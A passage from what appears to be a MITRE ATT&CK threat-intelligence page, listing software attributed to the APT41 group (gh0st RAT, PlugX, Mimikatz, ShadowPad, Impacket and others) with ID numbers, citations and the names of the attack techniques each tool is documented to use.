S0095 ftp [8] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Lateral Tool Transfer, Ingress Tool Transfer
S0032 gh0st RAT [2] Modify Registry, Shared Modules, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Encrypted Channel, Dynamic Resolution: Fast Flux DNS, Hijack Execution Flow: DLL Side-Loading, Deobfuscate/Decode Files or Information, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter, Screen Capture, Data Encoding: Standard Encoding, Native API, Query Registry, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Information Discovery, System Services: Service Execution, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Process Injection, Non-Application Layer Protocol
S0357 Impacket APT41 used Impacket to dump LSA secrets on one of the domain controllers in the victim network.[9] Windows Management Instrumentation, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, OS Credential Dumping: NTDS, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Ccache Files, System Services: Service Execution, Network Sniffing
S0100 ipconfig [3] System Network Configuration Discovery
S1051 KEYPLUG [7] Proxy, Encrypted Channel: Asymmetric Cryptography, Deobfuscate/Decode Files or Information, Application Layer Protocol: Web Protocols, Obfuscated Files or Information: Encrypted/Encoded File, System Time Discovery, Web Service: Dead Drop Resolver, Non-Application Layer Protocol
S1185 LightSpy [13] Application Layer Protocol: Web Protocols, Archive Collected Data, Audio Capture, Boot or Logon Initialization Scripts, Command and Scripting Interpreter, Credentials from Password Store: Keychain, Data Destruction, Data from Local System, Drive-By Compromise, Endpoint Denial of Service, Exfiltration Over C2 Channel, Exploitation for Client Execution, Exploitation for Privilege Escalation, Ingress Tool Transfer, Location Tracking, Masquerading, Native API, Network Service Scanning, Non-Standard Port, Obfuscated Files or Information, Phishing, Process Discovery, Process Injection, Protected User Data: Contact List, Protected User Data: Call Log, Protected User Data: SMS Messages, Screen Capture, SMS Control, Software Discovery, Stored Application Data, System Information Discovery, System Network Configuration Discovery: Wi-Fi Discovery, System Network Configuration Discovery, System Network Connections Discovery, Video Capture
S0443 MESSAGETAP [14][4] Deobfuscate/Decode Files or Information, Archive Collected Data: Archive via Custom Method, Data Staged: Local Data Staging, File and Directory Discovery, Indicator Removal: File Deletion, System Network Connections Discovery, Network Sniffing, Automated Collection
S0002 Mimikatz [2][3] Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, Rogue Domain Controller, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket, Boot or Logon Autostart Execution: Security Support Provider, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Unsecured Credentials: Private Keys, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Steal or Forge Authentication Certificates, Access Token Manipulation: SID-History Injection, Account Manipulation
S0039 Net [2] Create Account: Local Account, Create Account: Domain Account, Password Policy Discovery, Permission Groups Discovery: Domain Groups, Permission Groups Discovery: Local Groups, Indicator Removal: Network Share Connection Removal, System Time Discovery, System Services: Service Execution, System Service Discovery, System Network Connections Discovery, Network Share Discovery, Account Discovery: Domain Account, Account Discovery: Local Account, Account Manipulation: Additional Local or Domain Groups, Remote Services: SMB/Windows Admin Shares, Remote System Discovery
S0104 netstat [2] System Network Connections Discovery
S0385 njRAT [2] Credentials from Password Stores: Credentials from Web Browsers, Data from Local System, Modify Registry, Dynamic Resolution: Fast Flux DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Peripheral Device Discovery, Impair Defenses: Disable or Modify System Firewall, Screen Capture, Application Layer Protocol: Web Protocols, Application Window Discovery, Data Encoding: Standard Encoding, File and Directory Discovery, Native API, Query Registry, Obfuscated Files or Information: Encrypted/Encoded File, Obfuscated Files or Information: Compile After Delivery, Indicator Removal: File Deletion, Indicator Removal: Clear Persistence, System Information Discovery, System Owner/User Discovery, Video Capture, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Remote Services: Remote Desktop Protocol, Remote System Discovery, Exfiltration Over C2 Channel, Replication Through Removable Media, Non-Standard Port
S0097 Ping [2][3] Remote System Discovery
S0013 PlugX APT41 used a variant of PlugX to connect to Windows and Linux systems via SSH and Samba/CIFS.[1][2] Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Create or Modify System Process: Windows Service, Encrypted Channel: Symmetric Cryptography, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Deobfuscate/Decode Files or Information, Trusted Developer Utilities Proxy Execution: MSBuild, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Screen Capture, Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, File and Directory Discovery, Native API, Query Registry, Obfuscated Files or Information, System Network Connections Discovery, Network Share Discovery, Web Service: Dead Drop Resolver, Virtualization/Sandbox Evasion: System Checks, Ingress Tool Transfer, Input Capture: Keylogging, Process Discovery, Hide Artifacts: Hidden Files and Directories, Non-Application Layer Protocol
S0194 PowerSploit [2] Windows Management Instrumentation, Credentials from Password Stores: Windows Credential Manager, Data from Local System, Create or Modify System Process: Windows Service, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: DLL Search Order Hijacking, Hijack Execution Flow: Path Interception by Search Order Hijacking, Reflective Code Loading, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Security Support Provider, Command and Scripting Interpreter: PowerShell, Domain Trust Discovery, Screen Capture, OS Credential Dumping: LSASS Memory, Unsecured Credentials: Credentials in Registry, Unsecured Credentials: Group Policy Preferences, Query Registry, Obfuscated Files or Information: Indicator Removal from Tools, Obfuscated Files or Information: Command Obfuscation, Steal or Forge Kerberos Tickets: Kerberoasting, Access Token Manipulation, Account Discovery: Local Account, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Audio Capture, Scheduled Task/Job: Scheduled Task
S0006 pwdump [2] OS Credential Dumping: Security Account Manager
S0112 ROCKBOOT [2] Pre-OS Boot: Bootkit
S0596 ShadowPad [2][15] Modify Registry, Dynamic Resolution: Domain Generation Algorithms, Deobfuscate/Decode Files or Information, Application Layer Protocol: DNS, Application Layer Protocol: File Transfer Protocols, Application Layer Protocol: Web Protocols, Data Encoding: Non-Standard Encoding, Obfuscated Files or Information: Fileless Storage, Obfuscated Files or Information, Indicator Removal, System Information Discovery, System Owner/User Discovery, System Time Discovery, System Network Configuration Discovery, Ingress Tool Transfer, Process Discovery, Process Injection, Process Injection: Dynamic-link Library Injection, Non-Application Layer Protocol, Scheduled Transfer
S0225 sqlmap [10] Exploit Public-Facing Application
S0430 Winnti for Linux [4] Rootkit, Encrypted Channel: Symmetric Cryptography, Deobfuscate/Decode Files or Information, Application Layer Protocol: Web Protocols, Traffic Signaling, Obfuscated Files or Information: Encrypted/Encoded File, Ingress Tool Transfer, Non-Application Layer Protocol
S0412 ZxShell [2] Data from Local System, Proxy, Modify Registry, Create or Modify System Process: Windows Service, Create Account: Local Account, Exploit Public-Facing Application, Command and Scripting Interpreter: Windows Command Shell, Impair Defenses: Disable or Modify System Firewall, Impair Defenses: Disable or Modify Tools, Screen Capture, Application Layer Protocol: Web Protocols, Application Layer Protocol: File Transfer Protocols, File and Directory Discovery, Native API, Query Registry, Indicator Removal: Clear Windows Event Logs, Indicator Removal: File Deletion, System Binary Proxy Execution: Rundll32, System Information Discovery, System Owner/User Discovery, System Services: Service Execution, System Service Discovery, Endpoint Denial of Service, Network Service Discovery, Video Capture, Access Token Manipulation: Create Process with Token, Ingress Tool Transfer, Input Capture: Credential API Hooking, Input Capture: Keylogging, Process Discovery, Process Injection: Dynamic-link Library Injection, Remote Services: VNC, Remote Services: Remote Desktop Protocol, Non-Standard Port

References